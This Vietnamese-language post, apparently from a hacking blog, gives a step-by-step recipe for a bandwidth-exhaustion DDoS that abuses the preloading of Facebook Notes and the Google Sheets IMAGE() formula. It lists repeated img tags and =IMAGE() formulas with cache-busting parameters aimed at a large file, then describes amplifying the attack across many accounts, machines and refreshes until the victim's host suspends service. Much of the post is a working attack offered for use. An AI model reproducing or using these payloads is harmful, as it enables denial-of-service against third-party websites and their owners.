[DDOS] Sử dụng Facebook Notes và Google SpreadSheet để chiếm băng thông website

0
493
Các cơ chế proxy preload của các Mạng XH ( vd: Facebook ) và các Cloud Application ( vd: Google Docs ) tiềm tàng một nguy cơ là có thể bị “mượn tay” để tấn công DDoS hoặc tấn công chiếm băng thông
Qua thử nghiệm các Vul này trên Facebook thì trong 2 phút, nó nuốt trôi hơn 8GB băng thông
Nếu kết hợp cùng lúc nhiều account, nhiều dịch vụ cloud khác nhau ( có hỗ trợ proxy preload ) thì khả năng nạn nhân bị DoS và bị disable dịch vụ hosting vì hết băng thông rất cao
Cách thực hiện thử nghiệm:
Cần có:
Mua một VPS làm nạn nhân thử nghiệm
VPS cài iftop hoặc bất kỳ công cụ nào để xem băng thông bị chiếm dụng
Upload một file bất kỳ có kích thước > 10MB lên VPS. vd: test.pdf . Ghi lại URL tới file này ( vd: http://anonymousvn.tk/test.pdf )
Thực hiện tấn công với Facebook Notes:
Tạo một account Facebook bất kỳ, tạo Facebook Note với nội dung, chứa khoảng 1000 dòng như sau :
<img src=’http://anonymousvn.tk/test.pdf?r=1’/>
<img src=’http://anonymousvn.tk/test.pdf?r=2’/>
<img src=’http://anonymousvn.tk/test.pdf?r=3’/>
<img src=’http://anonymousvn.tk/test.pdf?r=4’/>
<img src=’http://anonymousvn.tk/test.pdf?r=5’/>
Chú ý sẽ thấy sau mỗi url sẽ có thêm một biến số bất kỳ với giá trị tăng dần, đây là chỗ làm tăng tốc và mức độ nguy hại của phương thức DoS này.
Mỗi dòng khi load lên sẽ gửi một request tới nạn nhân, 1000 dòng tương đường với 1000 request download file PDF 10MB như trên, tương đương 10GB băng thông bị ngốn.

Thực hiện tấn công với Google Docs: 

Tạo một file Google Docs Spreadsheet với 1000 dòng nội dung, mỗi dòng có nội dung tương tự như sau: 
=IMAGE(http://anonymousvn.tk/test.pdf?r=1)
=IMAGE(http://anonymousvn.tk/test.pdf?r=2)
=IMAGE(http://anonymousvn.tk/test.pdf?r=3)
=IMAGE(http://anonymousvn.tk/test.pdf?r=4)
=IMAGE(http://anonymousvn.tk/test.pdf?r=5)
Cách thức tăng mức độ nguy hại của kiểu tấn công này: 
– Phối hợp giữa Facebook Notes DDoS và Google Spreadsheet DDoS
– Refresh liên tục các trang notes và các trang spreadsheet
– Dùng nhiều account để mở nhiều trang notes và các trang spreadsheet
– Dùng nhiều máy tính + nhiều account để mở nhiều trang notes và các trang spreadsheetVới cách thức DDoS này thì băng thông tối đa có thể DDoS được lên đến 800Mbps. Và lưu lượng băng thông bị ngốn là rất lớn. Nếu gặp các dịch vụ hosting có giới hạng băng thông tối đa hàng tháng thì nạn nhân nhanh chóng bị ISP ngưng dịch vụ vì hết bandwidth limit của tháng.
Nguồn : Google 😀
loading...

LEAVE A REPLY

Please enter your comment!
Please enter your name here